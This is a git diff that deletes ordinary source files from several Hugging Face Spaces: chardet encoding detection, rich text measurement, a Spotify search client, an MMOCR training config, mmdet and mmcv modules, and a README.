- """ - if self.done: - return - - if not byte_str: - return - - if not isinstance(byte_str, bytearray): - byte_str = bytearray(byte_str) - - # First check for known BOMs, since these are guaranteed to be correct - if not self._got_data: - # If the data starts with BOM, we know it is UTF - if byte_str.startswith(codecs.BOM_UTF8): - # EF BB BF UTF-8 with BOM - self.result = { - "encoding": "UTF-8-SIG", - "confidence": 1.0, - "language": "", - } - elif byte_str.startswith((codecs.BOM_UTF32_LE, codecs.BOM_UTF32_BE)): - # FF FE 00 00 UTF-32, little-endian BOM - # 00 00 FE FF UTF-32, big-endian BOM - self.result = {"encoding": "UTF-32", "confidence": 1.0, "language": ""} - elif byte_str.startswith(b"\xFE\xFF\x00\x00"): - # FE FF 00 00 UCS-4, unusual octet order BOM (3412) - self.result = { - "encoding": "X-ISO-10646-UCS-4-3412", - "confidence": 1.0, - "language": "", - } - elif byte_str.startswith(b"\x00\x00\xFF\xFE"): - # 00 00 FF FE UCS-4, unusual octet order BOM (2143) - self.result = { - "encoding": "X-ISO-10646-UCS-4-2143", - "confidence": 1.0, - "language": "", - } - elif byte_str.startswith((codecs.BOM_LE, codecs.BOM_BE)): - # FF FE UTF-16, little endian BOM - # FE FF UTF-16, big endian BOM - self.result = {"encoding": "UTF-16", "confidence": 1.0, "language": ""} - - self._got_data = True - if self.result["encoding"] is not None: - self.done = True - return - - # If none of those matched and we've only see ASCII so far, check - # for high bytes and escape sequences - if self._input_state == InputState.PURE_ASCII: - if self.HIGH_BYTE_DETECTOR.search(byte_str): - self._input_state = InputState.HIGH_BYTE - elif ( - self._input_state == InputState.PURE_ASCII - and self.ESC_DETECTOR.search(self._last_char + byte_str) - ): - self._input_state = InputState.ESC_ASCII - - self._last_char = byte_str[-1:] - - # next we will look to see if it is appears to be either a UTF-16 or - # UTF-32 encoding - if not self._utf1632_prober: - self._utf1632_prober = UTF1632Prober() - - if self._utf1632_prober.state == ProbingState.DETECTING: - if self._utf1632_prober.feed(byte_str) == ProbingState.FOUND_IT: - self.result = { - "encoding": self._utf1632_prober.charset_name, - "confidence": self._utf1632_prober.get_confidence(), - "language": "", - } - self.done = True - return - - # If we've seen escape sequences, use the EscCharSetProber, which - # uses a simple state machine to check for known escape sequences in - # HZ and ISO-2022 encodings, since those are the only encodings that - # use such sequences. - if self._input_state == InputState.ESC_ASCII: - if not self._esc_charset_prober: - self._esc_charset_prober = EscCharSetProber(self.lang_filter) - if self._esc_charset_prober.feed(byte_str) == ProbingState.FOUND_IT: - self.result = { - "encoding": self._esc_charset_prober.charset_name, - "confidence": self._esc_charset_prober.get_confidence(), - "language": self._esc_charset_prober.language, - } - self.done = True - # If we've seen high bytes (i.e., those with values greater than 127), - # we need to do more complicated checks using all our multi-byte and - # single-byte probers that are left. The single-byte probers - # use character bigram distributions to determine the encoding, whereas - # the multi-byte probers use a combination of character unigram and - # bigram distributions. 
- elif self._input_state == InputState.HIGH_BYTE: - if not self._charset_probers: - self._charset_probers = [MBCSGroupProber(self.lang_filter)] - # If we're checking non-CJK encodings, use single-byte prober - if self.lang_filter & LanguageFilter.NON_CJK: - self._charset_probers.append(SBCSGroupProber()) - self._charset_probers.append(Latin1Prober()) - for prober in self._charset_probers: - if prober.feed(byte_str) == ProbingState.FOUND_IT: - self.result = { - "encoding": prober.charset_name, - "confidence": prober.get_confidence(), - "language": prober.language, - } - self.done = True - break - if self.WIN_BYTE_DETECTOR.search(byte_str): - self._has_win_bytes = True - - def close(self): - """ - Stop analyzing the current document and come up with a final - prediction. - - :returns: The ``result`` attribute, a ``dict`` with the keys - `encoding`, `confidence`, and `language`. - """ - # Don't bother with checks if we're already done - if self.done: - return self.result - self.done = True - - if not self._got_data: - self.logger.debug("no data received!") - - # Default to ASCII if it is all we've seen so far - elif self._input_state == InputState.PURE_ASCII: - self.result = {"encoding": "ascii", "confidence": 1.0, "language": ""} - - # If we have seen non-ASCII, return the best that met MINIMUM_THRESHOLD - elif self._input_state == InputState.HIGH_BYTE: - prober_confidence = None - max_prober_confidence = 0.0 - max_prober = None - for prober in self._charset_probers: - if not prober: - continue - prober_confidence = prober.get_confidence() - if prober_confidence > max_prober_confidence: - max_prober_confidence = prober_confidence - max_prober = prober - if max_prober and (max_prober_confidence > self.MINIMUM_THRESHOLD): - charset_name = max_prober.charset_name - lower_charset_name = max_prober.charset_name.lower() - confidence = max_prober.get_confidence() - # Use Windows encoding name instead of ISO-8859 if we saw any - # extra Windows-specific bytes - if lower_charset_name.startswith("iso-8859"): - if self._has_win_bytes: - charset_name = self.ISO_WIN_MAP.get( - lower_charset_name, charset_name - ) - self.result = { - "encoding": charset_name, - "confidence": confidence, - "language": max_prober.language, - } - - # Log all prober confidences if none met MINIMUM_THRESHOLD - if self.logger.getEffectiveLevel() <= logging.DEBUG: - if self.result["encoding"] is None: - self.logger.debug("no probers hit minimum threshold") - for group_prober in self._charset_probers: - if not group_prober: - continue - if isinstance(group_prober, CharSetGroupProber): - for prober in group_prober.probers: - self.logger.debug( - "%s %s confidence = %s", - prober.charset_name, - prober.language, - prober.get_confidence(), - ) - else: - self.logger.debug( - "%s %s confidence = %s", - group_prober.charset_name, - group_prober.language, - group_prober.get_confidence(), - ) - return self.result diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/measure.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/measure.py deleted file mode 100644 index a508ffa80bd715b47c190ed9d747dbc388fa5b19..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/measure.py +++ /dev/null @@ -1,151 +0,0 @@ -from operator import itemgetter -from typing import TYPE_CHECKING, Callable, NamedTuple, Optional, Sequence - -from . 
import errors -from .protocol import is_renderable, rich_cast - -if TYPE_CHECKING: - from .console import Console, ConsoleOptions, RenderableType - - -class Measurement(NamedTuple): - """Stores the minimum and maximum widths (in characters) required to render an object.""" - - minimum: int - """Minimum number of cells required to render.""" - maximum: int - """Maximum number of cells required to render.""" - - @property - def span(self) -> int: - """Get difference between maximum and minimum.""" - return self.maximum - self.minimum - - def normalize(self) -> "Measurement": - """Get measurement that ensures that minimum <= maximum and minimum >= 0 - - Returns: - Measurement: A normalized measurement. - """ - minimum, maximum = self - minimum = min(max(0, minimum), maximum) - return Measurement(max(0, minimum), max(0, max(minimum, maximum))) - - def with_maximum(self, width: int) -> "Measurement": - """Get a RenderableWith where the widths are <= width. - - Args: - width (int): Maximum desired width. - - Returns: - Measurement: New Measurement object. - """ - minimum, maximum = self - return Measurement(min(minimum, width), min(maximum, width)) - - def with_minimum(self, width: int) -> "Measurement": - """Get a RenderableWith where the widths are >= width. - - Args: - width (int): Minimum desired width. - - Returns: - Measurement: New Measurement object. - """ - minimum, maximum = self - width = max(0, width) - return Measurement(max(minimum, width), max(maximum, width)) - - def clamp( - self, min_width: Optional[int] = None, max_width: Optional[int] = None - ) -> "Measurement": - """Clamp a measurement within the specified range. - - Args: - min_width (int): Minimum desired width, or ``None`` for no minimum. Defaults to None. - max_width (int): Maximum desired width, or ``None`` for no maximum. Defaults to None. - - Returns: - Measurement: New Measurement object. - """ - measurement = self - if min_width is not None: - measurement = measurement.with_minimum(min_width) - if max_width is not None: - measurement = measurement.with_maximum(max_width) - return measurement - - @classmethod - def get( - cls, console: "Console", options: "ConsoleOptions", renderable: "RenderableType" - ) -> "Measurement": - """Get a measurement for a renderable. - - Args: - console (~rich.console.Console): Console instance. - options (~rich.console.ConsoleOptions): Console options. - renderable (RenderableType): An object that may be rendered with Rich. - - Raises: - errors.NotRenderableError: If the object is not renderable. - - Returns: - Measurement: Measurement object containing range of character widths required to render the object. 
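        A rough usage sketch (``console`` is assumed to be an existing
        :class:`~rich.console.Console` instance; any renderable or plain
        string can be measured)::

            measurement = Measurement.get(console, console.options, "hello world")
            minimum, maximum = measurement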
- """ - _max_width = options.max_width - if _max_width < 1: - return Measurement(0, 0) - if isinstance(renderable, str): - renderable = console.render_str( - renderable, markup=options.markup, highlight=False - ) - renderable = rich_cast(renderable) - if is_renderable(renderable): - get_console_width: Optional[ - Callable[["Console", "ConsoleOptions"], "Measurement"] - ] = getattr(renderable, "__rich_measure__", None) - if get_console_width is not None: - render_width = ( - get_console_width(console, options) - .normalize() - .with_maximum(_max_width) - ) - if render_width.maximum < 1: - return Measurement(0, 0) - return render_width.normalize() - else: - return Measurement(0, _max_width) - else: - raise errors.NotRenderableError( - f"Unable to get render width for {renderable!r}; " - "a str, Segment, or object with __rich_console__ method is required" - ) - - -def measure_renderables( - console: "Console", - options: "ConsoleOptions", - renderables: Sequence["RenderableType"], -) -> "Measurement": - """Get a measurement that would fit a number of renderables. - - Args: - console (~rich.console.Console): Console instance. - options (~rich.console.ConsoleOptions): Console options. - renderables (Iterable[RenderableType]): One or more renderable objects. - - Returns: - Measurement: Measurement object containing range of character widths required to - contain all given renderables. - """ - if not renderables: - return Measurement(0, 0) - get_measurement = Measurement.get - measurements = [ - get_measurement(console, options, renderable) for renderable in renderables - ] - measured_width = Measurement( - max(measurements, key=itemgetter(0)).minimum, - max(measurements, key=itemgetter(1)).maximum, - ) - return measured_width diff --git a/spaces/RedValis/Music-Helix/spotifysearch/calls.py b/spaces/RedValis/Music-Helix/spotifysearch/calls.py deleted file mode 100644 index 3f7cb3a0d02910c3e4652f96cfec8c9adaad27cf..0000000000000000000000000000000000000000 --- a/spaces/RedValis/Music-Helix/spotifysearch/calls.py +++ /dev/null @@ -1,24 +0,0 @@ - -# THIS FILE IS RESPONSABLE FOR API CALLS - -from . 
import urlbuilder -from requests import get, post - - -def call_acess_token(credentials): - endpoint = 'https://accounts.spotify.com/api/token' - data = { - 'grant_type':'client_credentials' - } - headers = { - 'Authorization':f'Basic {credentials}' - } - return post(url=endpoint, data=data, headers=headers) - - -def call_search(acess_token, args): - endpoint = urlbuilder.search_endpoint(*args) - headers = { - 'Authorization':f'Bearer {acess_token}' - } - return get(url=endpoint, headers=headers) diff --git a/spaces/Riksarkivet/htr_demo/models/SATRN/_base_satrn_shallow_concat.py b/spaces/Riksarkivet/htr_demo/models/SATRN/_base_satrn_shallow_concat.py deleted file mode 100644 index ae3c825b77556566a6ca6255d4b4300ecfdf39f0..0000000000000000000000000000000000000000 --- a/spaces/Riksarkivet/htr_demo/models/SATRN/_base_satrn_shallow_concat.py +++ /dev/null @@ -1,318 +0,0 @@ -default_scope = "mmocr" -env_cfg = dict( - cudnn_benchmark=True, mp_cfg=dict(mp_start_method="fork", opencv_num_threads=0), dist_cfg=dict(backend="nccl") -) -randomness = dict(seed=None) -default_hooks = dict( - timer=dict(type="IterTimerHook"), - logger=dict(type="LoggerHook", interval=100), - param_scheduler=dict(type="ParamSchedulerHook"), - checkpoint=dict(type="CheckpointHook", interval=1), - sampler_seed=dict(type="DistSamplerSeedHook"), - sync_buffer=dict(type="SyncBuffersHook"), - visualization=dict(type="VisualizationHook", interval=1, enable=False, show=False, draw_gt=False, draw_pred=False), -) -log_level = "INFO" -log_processor = dict(type="LogProcessor", window_size=10, by_epoch=True) -load_from = ( - "/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/models/checkpoints/1700_1800_combined_satrn/epoch_5.pth" -) -resume = False -val_evaluator = dict( - type="Evaluator", - metrics=[ - dict( - type="WordMetric", - mode=["exact", "ignore_case", "ignore_case_symbol"], - valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]", - ), - dict(type="CharMetric", valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]"), - dict(type="OneMinusNEDMetric", valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]"), - ], -) -test_evaluator = dict( - type="Evaluator", - metrics=[ - dict( - type="WordMetric", - mode=["exact", "ignore_case", "ignore_case_symbol"], - valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]", - ), - dict(type="CharMetric", valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]"), - dict(type="OneMinusNEDMetric", valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]"), - ], -) -vis_backends = [dict(type="LocalVisBackend")] -visualizer = dict(type="TextRecogLocalVisualizer", name="visualizer", vis_backends=[dict(type="TensorboardVisBackend")]) -optim_wrapper = dict(type="OptimWrapper", optimizer=dict(type="Adam", lr=0.0003)) -train_cfg = dict(type="EpochBasedTrainLoop", max_epochs=5, val_interval=1) -val_cfg = dict(type="ValLoop") -test_cfg = dict(type="TestLoop") -param_scheduler = [dict(type="MultiStepLR", milestones=[3, 4], end=5)] -file_client_args = dict(backend="disk") -dictionary = dict( - type="Dictionary", - dict_file="./models/SATRN/dict1700.txt", - with_padding=True, - with_unknown=True, - same_start_end=True, - with_start=True, - with_end=True, -) -model = dict( - type="SATRN", - backbone=dict(type="ShallowCNN", input_channels=3, hidden_dim=512), - encoder=dict( - type="SATRNEncoder", - n_layers=12, - n_head=8, - d_k=64, - d_v=64, - d_model=512, - n_position=100, - d_inner=2048, - dropout=0.1, - ), - decoder=dict( - type="NRTRDecoder", - n_layers=6, - d_embedding=512, - n_head=8, - d_model=512, - d_inner=2048, - d_k=64, - d_v=64, - 
module_loss=dict(type="CEModuleLoss", flatten=True, ignore_first_char=True), - dictionary=dict( - type="Dictionary", - dict_file="./models/SATRN/dict1700.txt", - with_padding=True, - with_unknown=True, - same_start_end=True, - with_start=True, - with_end=True, - ), - max_seq_len=100, - postprocessor=dict(type="AttentionPostprocessor"), - ), - data_preprocessor=dict( - type="TextRecogDataPreprocessor", mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375] - ), -) -train_pipeline = [ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk"), ignore_empty=True, min_size=2), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), -] -test_pipeline = [ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk")), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), -] -HTR_1700_combined_train = dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_HTR_shuffled_train.jsonl", - test_mode=False, - pipeline=None, -) -HTR_1700_combined_test = dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_HTR_shuffled_val.jsonl", - test_mode=True, - pipeline=None, -) -pr_cr_combined_train = dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineStrParser", keys=["filename", "text"], separator="|"), - data_root="/ceph/hpc/scratch/user/euerikl/data/line_images", - ann_file="/ceph/hpc/home/euerikl/projects/htr_1800/gt_files/combined_train.txt", - test_mode=False, - pipeline=None, -) -pr_cr_combined_test = dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineStrParser", keys=["filename", "text"], separator="|"), - data_root="/ceph/hpc/scratch/user/euerikl/data/line_images", - ann_file="/ceph/hpc/home/euerikl/projects/htr_1800/gt_files/combined_eval.txt", - test_mode=True, - pipeline=None, -) -out_of_domain_1700_all_test = dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_testsets_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_testsets_gt/1700_HTR_testsets_all.jsonl", - test_mode=True, - pipeline=None, -) -train_list = [ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_HTR_shuffled_train.jsonl", - test_mode=False, - pipeline=None, - ), - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineStrParser", keys=["filename", "text"], separator="|"), - data_root="/ceph/hpc/scratch/user/euerikl/data/line_images", - ann_file="/ceph/hpc/home/euerikl/projects/htr_1800/gt_files/combined_train.txt", - test_mode=False, - pipeline=None, - ), -] -test_list = [ - dict( - type="RecogTextDataset", - 
parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_testsets_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_testsets_gt/1700_HTR_testsets_all.jsonl", - test_mode=True, - pipeline=None, - ) -] -train_dataset = dict( - type="ConcatDataset", - datasets=[ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_HTR_shuffled_train.jsonl", - test_mode=False, - pipeline=None, - ), - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineStrParser", keys=["filename", "text"], separator="|"), - data_root="/ceph/hpc/scratch/user/euerikl/data/line_images", - ann_file="/ceph/hpc/home/euerikl/projects/htr_1800/gt_files/combined_train.txt", - test_mode=False, - pipeline=None, - ), - ], - pipeline=[ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk"), ignore_empty=True, min_size=2), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), - ], -) -test_dataset = dict( - type="ConcatDataset", - datasets=[ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_testsets_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_testsets_gt/1700_HTR_testsets_all.jsonl", - test_mode=True, - pipeline=None, - ) - ], - pipeline=[ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk")), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), - ], -) -train_dataloader = dict( - batch_size=8, - num_workers=1, - persistent_workers=True, - sampler=dict(type="DefaultSampler", shuffle=True), - dataset=dict( - type="ConcatDataset", - datasets=[ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_HTR_shuffled_train.jsonl", - test_mode=False, - pipeline=None, - ), - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineStrParser", keys=["filename", "text"], separator="|"), - data_root="/ceph/hpc/scratch/user/euerikl/data/line_images", - ann_file="/ceph/hpc/home/euerikl/projects/htr_1800/gt_files/combined_train.txt", - test_mode=False, - pipeline=None, - ), - ], - pipeline=[ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk"), ignore_empty=True, min_size=2), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), - ], - ), -) -test_dataloader = dict( - batch_size=8, - num_workers=1, - persistent_workers=True, - drop_last=False, - sampler=dict(type="DefaultSampler", shuffle=False), - dataset=dict( - type="ConcatDataset", - datasets=[ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - 
data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_testsets_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_testsets_gt/1700_HTR_testsets_all.jsonl", - test_mode=True, - pipeline=None, - ) - ], - pipeline=[ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk")), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), - ], - ), -) -val_dataloader = dict( - batch_size=8, - num_workers=1, - persistent_workers=True, - drop_last=False, - sampler=dict(type="DefaultSampler", shuffle=False), - dataset=dict( - type="ConcatDataset", - datasets=[ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_testsets_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_testsets_gt/1700_HTR_testsets_all.jsonl", - test_mode=True, - pipeline=None, - ) - ], - pipeline=[ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk")), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), - ], - ), -) -gpu_ids = range(0, 4) -cudnn_benchmark = True -work_dir = "/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/models/checkpoints/1700_1800_combined_satrn" -checkpoint_config = dict(interval=1) -auto_scale_lr = dict(base_batch_size=32) -launcher = "pytorch" diff --git a/spaces/Rishwanth08/Naniai/README.md b/spaces/Rishwanth08/Naniai/README.md deleted file mode 100644 index da502257d56992dd77c716287cf5f4ffb22d0f1c..0000000000000000000000000000000000000000 --- a/spaces/Rishwanth08/Naniai/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Naniai -emoji: 🔥 -colorFrom: indigo -colorTo: purple -sdk: gradio -sdk_version: 3.39.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/pisa_roi_head.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/pisa_roi_head.py deleted file mode 100644 index e01113629837eb9c065ba40cd4025899b7bd0172..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/pisa_roi_head.py +++ /dev/null @@ -1,159 +0,0 @@ -from mmdet.core import bbox2roi -from ..builder import HEADS -from ..losses.pisa_loss import carl_loss, isr_p -from .standard_roi_head import StandardRoIHead - - -@HEADS.register_module() -class PISARoIHead(StandardRoIHead): - r"""The RoI head for `Prime Sample Attention in Object Detection - `_.""" - - def forward_train(self, - x, - img_metas, - proposal_list, - gt_bboxes, - gt_labels, - gt_bboxes_ignore=None, - gt_masks=None): - """Forward function for training. - - Args: - x (list[Tensor]): List of multi-level img features. - img_metas (list[dict]): List of image info dict where each dict - has: 'img_shape', 'scale_factor', 'flip', and may also contain - 'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'. - For details on the values of these keys see - `mmdet/datasets/pipelines/formatting.py:Collect`. - proposals (list[Tensors]): List of region proposals. 
- gt_bboxes (list[Tensor]): Each item are the truth boxes for each - image in [tl_x, tl_y, br_x, br_y] format. - gt_labels (list[Tensor]): Class indices corresponding to each box - gt_bboxes_ignore (list[Tensor], optional): Specify which bounding - boxes can be ignored when computing the loss. - gt_masks (None | Tensor) : True segmentation masks for each box - used if the architecture supports a segmentation task. - - Returns: - dict[str, Tensor]: a dictionary of loss components - """ - # assign gts and sample proposals - if self.with_bbox or self.with_mask: - num_imgs = len(img_metas) - if gt_bboxes_ignore is None: - gt_bboxes_ignore = [None for _ in range(num_imgs)] - sampling_results = [] - neg_label_weights = [] - for i in range(num_imgs): - assign_result = self.bbox_assigner.assign( - proposal_list[i], gt_bboxes[i], gt_bboxes_ignore[i], - gt_labels[i]) - sampling_result = self.bbox_sampler.sample( - assign_result, - proposal_list[i], - gt_bboxes[i], - gt_labels[i], - feats=[lvl_feat[i][None] for lvl_feat in x]) - # neg label weight is obtained by sampling when using ISR-N - neg_label_weight = None - if isinstance(sampling_result, tuple): - sampling_result, neg_label_weight = sampling_result - sampling_results.append(sampling_result) - neg_label_weights.append(neg_label_weight) - - losses = dict() - # bbox head forward and loss - if self.with_bbox: - bbox_results = self._bbox_forward_train( - x, - sampling_results, - gt_bboxes, - gt_labels, - img_metas, - neg_label_weights=neg_label_weights) - losses.update(bbox_results['loss_bbox']) - - # mask head forward and loss - if self.with_mask: - mask_results = self._mask_forward_train(x, sampling_results, - bbox_results['bbox_feats'], - gt_masks, img_metas) - losses.update(mask_results['loss_mask']) - - return losses - - def _bbox_forward(self, x, rois): - """Box forward function used in both training and testing.""" - # TODO: a more flexible way to decide which feature maps to use - bbox_feats = self.bbox_roi_extractor( - x[:self.bbox_roi_extractor.num_inputs], rois) - if self.with_shared_head: - bbox_feats = self.shared_head(bbox_feats) - cls_score, bbox_pred = self.bbox_head(bbox_feats) - - bbox_results = dict( - cls_score=cls_score, bbox_pred=bbox_pred, bbox_feats=bbox_feats) - return bbox_results - - def _bbox_forward_train(self, - x, - sampling_results, - gt_bboxes, - gt_labels, - img_metas, - neg_label_weights=None): - """Run forward function and calculate loss for box head in training.""" - rois = bbox2roi([res.bboxes for res in sampling_results]) - - bbox_results = self._bbox_forward(x, rois) - - bbox_targets = self.bbox_head.get_targets(sampling_results, gt_bboxes, - gt_labels, self.train_cfg) - - # neg_label_weights obtained by sampler is image-wise, mapping back to - # the corresponding location in label weights - if neg_label_weights[0] is not None: - label_weights = bbox_targets[1] - cur_num_rois = 0 - for i in range(len(sampling_results)): - num_pos = sampling_results[i].pos_inds.size(0) - num_neg = sampling_results[i].neg_inds.size(0) - label_weights[cur_num_rois + num_pos:cur_num_rois + num_pos + - num_neg] = neg_label_weights[i] - cur_num_rois += num_pos + num_neg - - cls_score = bbox_results['cls_score'] - bbox_pred = bbox_results['bbox_pred'] - - # Apply ISR-P - isr_cfg = self.train_cfg.get('isr', None) - if isr_cfg is not None: - bbox_targets = isr_p( - cls_score, - bbox_pred, - bbox_targets, - rois, - sampling_results, - self.bbox_head.loss_cls, - self.bbox_head.bbox_coder, - **isr_cfg, - 
num_class=self.bbox_head.num_classes) - loss_bbox = self.bbox_head.loss(cls_score, bbox_pred, rois, - *bbox_targets) - - # Add CARL Loss - carl_cfg = self.train_cfg.get('carl', None) - if carl_cfg is not None: - loss_carl = carl_loss( - cls_score, - bbox_targets[0], - bbox_pred, - bbox_targets[2], - self.bbox_head.loss_bbox, - **carl_cfg, - num_class=self.bbox_head.num_classes) - loss_bbox.update(loss_carl) - - bbox_results.update(loss_bbox=loss_bbox) - return bbox_results diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/engine/__init__.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/engine/__init__.py deleted file mode 100644 index 3193b7f664e19ce2458d81c836597fa22e4bb082..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/engine/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from .test import (collect_results_cpu, collect_results_gpu, multi_gpu_test, - single_gpu_test) - -__all__ = [ - 'collect_results_cpu', 'collect_results_gpu', 'multi_gpu_test', - 'single_gpu_test' -] diff --git a/spaces/Rothfeld/stable-diffusion-mat-outpainting-primer/torch_utils/ops/grid_sample_gradfix.py b/spaces/Rothfeld/stable-diffusion-mat-outpainting-primer/torch_utils/ops/grid_sample_gradfix.py deleted file mode 100644 index ca6b3413ea72a734703c34382c023b84523601fd..0000000000000000000000000000000000000000 --- a/spaces/Rothfeld/stable-diffusion-mat-outpainting-primer/torch_utils/ops/grid_sample_gradfix.py +++ /dev/null @@ -1,83 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Custom replacement for `torch.nn.functional.grid_sample` that -supports arbitrarily high order gradients between the input and output. -Only works on 2D images and assumes -`mode='bilinear'`, `padding_mode='zeros'`, `align_corners=False`.""" - -import warnings -import torch - -# pylint: disable=redefined-builtin -# pylint: disable=arguments-differ -# pylint: disable=protected-access - -#---------------------------------------------------------------------------- - -enabled = False # Enable the custom op by setting this to true. - -#---------------------------------------------------------------------------- - -def grid_sample(input, grid): - if _should_use_custom_op(): - return _GridSample2dForward.apply(input, grid) - return torch.nn.functional.grid_sample(input=input, grid=grid, mode='bilinear', padding_mode='zeros', align_corners=False) - -#---------------------------------------------------------------------------- - -def _should_use_custom_op(): - if not enabled: - return False - if any(torch.__version__.startswith(x) for x in ['1.7.', '1.8.', '1.9']): - return True - warnings.warn(f'grid_sample_gradfix not supported on PyTorch {torch.__version__}. 
